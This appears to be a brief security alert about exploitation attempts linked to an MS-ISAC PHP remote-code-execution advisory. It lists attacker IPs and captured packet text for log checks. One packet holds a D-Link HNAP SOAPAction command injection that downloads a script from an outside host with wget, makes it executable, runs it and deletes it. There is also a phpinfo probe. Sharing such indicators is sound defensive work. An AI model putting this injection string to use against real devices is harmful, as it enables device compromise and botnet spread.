We're seeing evidence of command injection attempts, likely exploitation of this 0-day sent out by MS-ISAC. MS-ISAC CYBERSECURITY ADVISORY - Multiple Vulnerabilities in PHP Could Allow for Remote Code Execution - PATCH NOW - TLP: CLEAR (cisecurity.org) https://learn.cisecurity.org/webmail/799323/2287372849/ae8748c409eb66ac8699d6f8c46cb6c049f8310d7514b3f7ef293982cfee61d1
Please check the logs of any servers that might be affected for these IOCs
Source IPs: 154.6.147.208 104.192.1.166 45.90.163.19
RCE Payload
... ..... ....E..;....@............0.P........P. .....<?php phpinfo(); ?>
Packet Text
... ..... ....E.......@...h..........P........P. .....path=/2xMhQtOP/test&_variables=%7B%22_metadata%22%3A%7B%22classname%22%3A%22ws/test.xml%22%7D%2C%22_variables%22%3A%7B%7D%7D
Packet Text
... ..... ....E..|....@...-Z.......6.P........P. .....Host: 137.190.21.9:80 http://137.190.21.9/ User-Agent: Mozila/5.0 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/%60cd http://purenetworks.com/HNAP1/GetDeviceSettings/cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://146.19.191.205/a/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`" Content-Length: 0